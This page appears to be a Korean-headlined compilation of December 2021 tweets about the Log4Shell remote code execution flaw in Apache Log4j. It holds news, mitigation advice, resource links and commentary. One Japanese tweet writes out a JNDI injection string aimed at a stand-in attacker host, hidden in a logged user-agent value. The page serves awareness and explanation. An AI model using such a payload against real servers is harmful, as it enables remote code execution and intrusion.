Apache log4j Java 로깅 라이브러리 원격 코드 실행 취약점 발견, (스팀, 아이클라우드, 마인크래프트 등 여러 서비스가 영향)

Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package | LunaSec https://t.co/q34d4Lz3HC

— lunamoth (@lunamoth) December 11, 2021

?⚠️New #0-day vulnerability tracked under "Log4Shell" and CVE-2021-44228 discovered in Apache Log4j ?️‼️ We are observing attacks in our honeypot infrastructure coming from the TOR network. Find Mitigation instructions here: https://t.co/tUKJSn8RPF pic.twitter.com/WkAn911rZX

— Deutsche Telekom CERT (@DTCERT) December 10, 2021

If you're running a server with #Log4J, please add the following JVM argument to your command line immediately to protect against a 0-day exploit.

-Dlog4j2.formatMsgNoLookups=truehttps://t.co/MWYhEdnS0r#Java #Security #Infosec

— Bruno Borges (@brunoborges) December 10, 2021

We wrote up a summary on the log4j 0-day that was found earlier today. This is going to be fun for a lot of people scrambling to patch this tonight! https://t.co/Dqmt5Iqsg4

— Free Qaz (@freeqaz) December 10, 2021

Remote code execution in log4j. Java. This library is in broad use. This might be security-ugly in many corporate settings. "services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable" https://t.co/ks4IvbVLmE https://t.co/qylCnADbgY pic.twitter.com/EOsVL4QcXE

— Lukasz Olejnik (@lukOlejnik) December 10, 2021

Resources for Log4j vuln. Reply here with more.

- Overview by @LunaSecIO: https://t.co/4oMCSkvUKd

- Vulnerable Hashes by @mubix: https://t.co/u0yGrCIts2

- IP’s Exploiting by @GreyNoiseIO: https://t.co/9z8N9wK4j4

- Detection Rules by @cyb3rops: https://t.co/io52zB6JHB

— Frank McGovern (@FrankMcG) December 10, 2021

CVE 2021-44228: Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package
Affected Apache log4j2 Versions​ 2.0 <= Apache log4j <= 2.14.1

PoChttps://t.co/0pkB9hFHDl pic.twitter.com/bfK2YUjjJ2

— Cyber Advising (@cyber_advising) December 11, 2021

If you read about the recent Log4shell security exploit that may affect some Java apps, worth noting that both Nextflow and Nextflow Tower do *not* use the Log4j logging library causing this problem. All safe. Have a nice weekend! ?https://t.co/fzbeLSvMQQ

— paoloditommaso (@PaoloDiTommaso) December 11, 2021

いつの間にか「Log4Shell」という名前がついてた。
RCE 0-day exploit found in log4j2, a popular Java logging packagehttps://t.co/cNzQ5i6kBU

— とある診断員 (@tigerszk) December 11, 2021

A few hours ago, a 0-day RCE exploit was discovered in the logging library log4j. You may not have heard of it, but it's everywhere.

Per @LunaSecIO: "Many, many services are vulnerable".

They include Steam, Apple iCloud, Minecraft, and others.https://t.co/QavDOnDUCp

— Malwarebytes (@Malwarebytes) December 10, 2021

Let me save you a bunch of clicks:

PoC: https://t.co/yShp4iRTxJ
Patch: https://t.co/rVSq2EZfoT
Technical breakdown: https://t.co/QWRkh6rk4y
Systems confirmed vulnerable: https://t.co/Fe2K7vwcV2 pic.twitter.com/9YlNzB1uEF

— Catalin Cimpanu (@campuscodi) December 10, 2021

So. I hope you all went and checked your java applications for the log4j vulnerability this morning, right?
If not:
- do it, it's a bad one https://t.co/93TXh8bMlV
- there are minecraft servers with a better security posture than your enterprise, and I am judging you for that

— Geoffroy Couprie (@gcouprie) December 10, 2021

Go Check ➡️ https://t.co/psud1GpTys for callbacks.
References: https://t.co/iGStqofHn6
Log4j Attack Surface: https://t.co/C6WQ0KjgHf
Log4j Dependecies Repos: https://t.co/ilQQCXAlt2#log4jRCE #log4j #Log4Shell #infosec @shifacyclewala

— Frooti ? (@HackerGautam) December 11, 2021

“Unless it is fixed, it grants criminals, spies and programming novices alike easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.”https://t.co/94HQYQ6HHd

— The Grey Man (@IntelOperator) December 11, 2021

Bad actors have been quick to exploit one of the worst computer vulnerabilities discovered in years, say experts who have been scrambling to fix a flaw in an open-source code that's widely used in cloud services. https://t.co/ahow9GAxeq

— NPR (@NPR) December 11, 2021

$ASTA @astra_veda_ @ParanotekLLC @sayphr ?
“The internet’s on fire right now,” senior vice-president of intelligence at the cybersecurity firm Crowdstrike.

“I’d be hard-pressed to think of a company that’s not at risk.”#CyberSecurity #QuantumComputinghttps://t.co/ARDSOAq9sM

— Brian Walton (@BrianWalton78) December 11, 2021

Recently uncovered software flaw ‘most critical vulnerability of the last decade’ https://t.co/jjwnpjXTwc @Msmariablack for interest

— 2024WonderWomanOnTarget (@EdnaKB2) December 11, 2021

Given the UK govt's desire to accumulate data on its citizens, and the recent data breaches/loss/ and donations to US healthcare etc...

this is worrying!https://t.co/pIP3nXkhMY @StillShielding @LizWebsterLD @jneill @VesperUK @HealthFirstAK @HuguenotHouse @fish_in_a_hat

— Proof in the Putting (@HereBeProof) December 11, 2021

Network vulnerability dubbed "possibly the biggest in the history of modern computing" already being weaponized. #cybersecurity
TLDR: Allows network access with no password; all computers everywhere at risk. Patches being developed but are app-specific.https://t.co/a7sHXbMRyP

— Timothy Peterson (@nsquaredcrypto) December 11, 2021

For my security friends : could this have been caused by https://t.co/3UgvOHFcHI ? (10/)

— ???? ??? ??? (@henkvaness) December 11, 2021

“The vulnerability was first discovered on Minecraft and thought to involve only the gaming platform but quick exploration revealed that the vulnerability potentially affects any software using this library.”https://t.co/lOxY1BWzZV

— The Grey Man (@IntelOperator) December 11, 2021

My non-techy explainer went up an hour ago:https://t.co/lMScLfP0Ng

— Nicholas Weaver (@ncweaver) December 10, 2021

What started as a Minecraft prank has turned into a nightmare. @ncweaver takes us down the winding road to explain Log4Shell: https://t.co/vLr5weg5yq

— Lawfare (@lawfareblog) December 10, 2021

What's the Deal with the Log4Shell Security Nightmare? https://t.co/pd2e1XPshG #opensource

— Free Open Source Software and Linux ? (@FOSS_Linux) December 11, 2021

My writeup for non-techies:https://t.co/lMScLfP0Ng

— Nicholas Weaver (@ncweaver) December 11, 2021

I should be doing productive things like working on finals, but instead I spent much of the morning writing up a non-technical explainer about log4shell for @lawfareblog https://t.co/lMScLfP0Ng

— Nicholas Weaver (@ncweaver) December 10, 2021

Log4Shell shows yet again that clouds are full of parsers, and that any input is a program #LangSec [https://t.co/iJZStjEz3o]

— sergey bratus (@sergeybratus) December 11, 2021

Let me know if you have any issues - further QA pending. Background info here: https://t.co/ICXvMnwIjn

— James Kettle (@albinowax) December 10, 2021

https://t.co/KTyqTFUoOg
・info("Request User Agent:" + userAgent);とかしたとき、UAをいじるとinfo("...${jndi:ldap://attacker.com/a}")を実行できる←わかる
・そのとき、https://t.co/zY3tVowZrSへのアクセスが発生する←ギリわかる
・attackerがclassファイルを返したとき、実行される←なぜ？

— yhara (Yutaka HARA) (@yhara) December 10, 2021

これかなりやばいな。ログにかます文字列にLDAPのアドレスに対してJNDIルックアップを要求する式を入れると成立しちゃうのか。Webアプリとかで外部から送信した文字列をログ出力する箇所があったらアウト？ https://t.co/tMcSiDFKyl

— AOE Takashi (@aoetk) December 10, 2021

思ってたよりずっとひどいバグだった。これは想像を超えてる。　https://t.co/RB3iq96Xtk

— Rui Ueyama (@rui314) December 10, 2021

Javaで広く使われているログ生成ライブラリlog4jにRCE(Remote Code Execution)を極めて容易に引き起こす脆弱性が発見されたという話題

　＊　＊　＊

RCE 0-day exploit found in log4j, a popular Java logging package | LunaSechttps://t.co/yBeqYTwyAT

— 結城浩 (@hyuki) December 10, 2021

Hi Philip, see the following line:https://t.co/GhbYLtS97I

It's calling a Burp Collaborator payload, if you receive the pingback from the server it could be vulnerable.

See the following steps:https://t.co/JY6TTEY1wv

— Maximiliano Soler (@MaxiSoler) December 10, 2021

? #log4j CVE-2021-44228#0day
ℹ️ https://t.co/FGqZ0aZNxg#Affected
- #CADENCE SPB_XX PCBDW
- #86DUINO
...

ℹ️ Log4j is a popular logging library for Java applications.#VulnerabilityCheckScript
ℹ️ https://t.co/gGBYC3aCFb#PoC Remote Code Executionhttps://t.co/R45SPuci67

— rudi ;-) (@eMbeddedHome) December 12, 2021

Looks like the #log4j2 0-day vulnerability will keep SysAdmins busy next week and #DFIR people busy for a few months. Prepare yourself for #ransomware threat actors to start using it in about a week.
Here's a good write up on the technical details: https://t.co/9ph4MlyJ5a

— Josh Lemon (@joshlemon) December 11, 2021

それより前のバージョンなら、ログの出力パターンを書き換えることで対応可能。あと、JndiLookupを空実装で置き換えとかも。https://t.co/X23CEuNhFd

— t_yano (@t_yano) December 11, 2021

It's going to be an interesting week. Just on the heels of their financial system war games last week and Klaus Schwab's ever prescient predictions of the apocalypse. More coincidence theory. https://t.co/upZdaXK5wl

— jonniegg (@jonniegg) December 12, 2021

Recently uncovered software flaw ‘most critical vulnerability of the last decade’

Read more- https://t.co/6Asx3gmpIr#thecybersecurityclub #cybersecurity #malware #minecraft #programming #ransomeware #technology #log4shell #thegurdian pic.twitter.com/2SqgGDimPm

— The Cybersecurity Club (@TCybersecurityC) December 11, 2021

“A critical vulnerability in a widely used software tool – one quickly exploited in the online game Minecraft – is rapidly emerging as a major threat to organizations around the world.”https://t.co/nC42actnRr

— Adam Levin (@Adam_K_Levin) December 11, 2021

Well done piece in @lawfareblog on the log4j vuln. I wonder if this vuln had been pre-reported to authorities under the Reg that went into effect Sept 1 before it was released publicly. https://t.co/P6QymY4Qe9

— Cristin Goodwin (@CristinGoodwin) December 11, 2021